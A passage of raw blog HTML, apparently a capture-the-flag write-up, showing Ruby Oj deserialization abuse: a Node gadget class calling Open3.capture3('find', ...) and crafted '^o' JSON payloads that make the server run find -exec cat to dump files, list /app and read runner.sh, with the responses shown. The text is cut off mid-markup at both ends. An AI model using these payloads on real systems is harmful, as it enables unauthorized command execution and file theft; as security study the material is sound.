class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>class Node\n def initialize(args=[])\n @args = args\n end\n\n def run_find()\n puts Open3.capture3(\"find\", *@args)\n end\nend<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">class<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">Node<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">def<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">initialize<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9\">args<\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #ECEFF4\">[])<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">@<\/span><span style=\"color: #D8DEE9\">args<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> args<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">def<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">run_find<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #8FBCBB\">Open3<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">capture3<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">find<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*@<\/span><span style=\"color: #D8DEE9\">args<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">end<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">end<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>If a deserialized object responds to run_find, it will be executed automatically.<\/p>\n\n\n\n<p>Using <code>Oj<\/code>\u2019s object creation feature, I crafted the following payload:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>{ \n \"^o\": \"Node\", \n \"args\": [\"\/\", \"-type\", \"f\", \"-size\", \"-5k\", \"-exec\", \"cat\", \"{}\", \";\"]\n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><span style=\"color: #D8DEE9FF\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #8FBCBB\">^o<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">Node<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #8FBCBB\">args<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">[<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">\/<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">-type<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">f<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">-size<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">-5k<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">-exec<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">cat<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">{}<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">;<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>This caused the application to execute:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>find \/ -type f -size -5k -exec cat {} ;<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">find<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">\/<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">-type<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">f<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">-size<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">-5k<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">-exec<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">cat<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">{}<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Response:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>#!\/bin\/sh\nCHROOT=\"\/tmp\/chroot\"\ncreate_chroot() {\n if [ ! -d \"$CHROOT\" ]; then\n mkdir -p \"$CHROOT\/bin\"\n[...]<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #616E88\">#!\/bin\/sh<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9\">CHROOT<\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">\/tmp\/chroot<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">create_chroot<\/span><span style=\"color: #ECEFF4\">()<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">if<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">[<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">!<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">-d<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #D8DEE9\">$CHROOT<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">]<\/span><span style=\"color: #81A1C1\">;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">then<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">mkdir<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">-p<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #D8DEE9\">$CHROOT<\/span><span style=\"color: #A3BE8C\">\/bin<\/span><span style=\"color: #ECEFF4\">"<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">[<\/span><span style=\"color: #D8DEE9FF\">...<\/span><span style=\"color: #ECEFF4\">]<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>The output showed scripts related to a chroot jail, indicating the application was running in a restricted filesystem.<\/p>\n\n\n\n<p>I used the following payload to list files under <code>\/app<\/code>:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>{\n \"^o\":\"Node\",\n \"args\":[\"\/app\",\"-type\",\"f\",\"-maxdepth\",\"3\"]\n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #8FBCBB\">^o<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">Node<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #8FBCBB\">args<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">:[<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">\/app<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">-type<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">f<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">-maxdepth<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">3<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Response:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\/app\/index.js\n\/app\/runner.sh\n\/app\/supervisord.pid\n\/app\/chroot-me\n\/app\/supervisord.log\n\/app\/package.json<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #d8dee9ff\">\/app\/index.js<\/span><\/span>\n<span class=\"line\"><span style=\"color: #d8dee9ff\">\/app\/runner.sh<\/span><\/span>\n<span class=\"line\"><span style=\"color: #d8dee9ff\">\/app\/supervisord.pid<\/span><\/span>\n<span class=\"line\"><span style=\"color: #d8dee9ff\">\/app\/chroot-me<\/span><\/span>\n<span class=\"line\"><span style=\"color: #d8dee9ff\">\/app\/supervisord.log<\/span><\/span>\n<span class=\"line\"><span style=\"color: #d8dee9ff\">\/app\/package.json<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>This revealed several application files, including a startup script:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\/app\/runner.sh<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #d8dee9ff\">\/app\/runner.sh<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>See inside files<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>{\n \"^o\":\"Node\",\n \"args\":[\"\/app\/runner.sh\",\"-exec\",\"cat\",\"{}\",\";\"]\n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #8FBCBB\">^o<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #ECEFF4\">"<\/span><span 